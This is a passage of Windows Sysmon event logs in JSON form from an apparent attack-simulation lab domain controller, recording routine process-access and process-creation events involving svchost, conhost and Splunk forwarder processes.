07:59:41.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5951,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5952,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20ED-5F25-0000-0010A6440900}\r\nTargetProcessId: 1212\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20ED-5F25-0000-0010A6440900}","TargetProcessId":"1212","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5953,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.519\r\nSourceProcessGUID: {41C8662E-20ED-5F25-0000-0010A6440900}\r\nSourceProcessId: 1212\r\nSourceThreadId: 4176\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.519","SourceProcessGUID":"{41C8662E-20ED-5F25-0000-0010A6440900}","SourceProcessId":"1212","SourceThreadId":"4176","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5954,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.927\r\nProcessGuid: {41C8662E-20ED-5F25-0000-001077460900}\r\nProcessId: 2232\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.927","ProcessGuid":"{41C8662E-20ED-5F25-0000-001077460900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5955,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20ED-5F25-0000-001077460900}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20ED-5F25-0000-001077460900}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5956,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20ED-5F25-0000-001077460900}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20ED-5F25-0000-001077460900}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5957,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5958,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5959,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 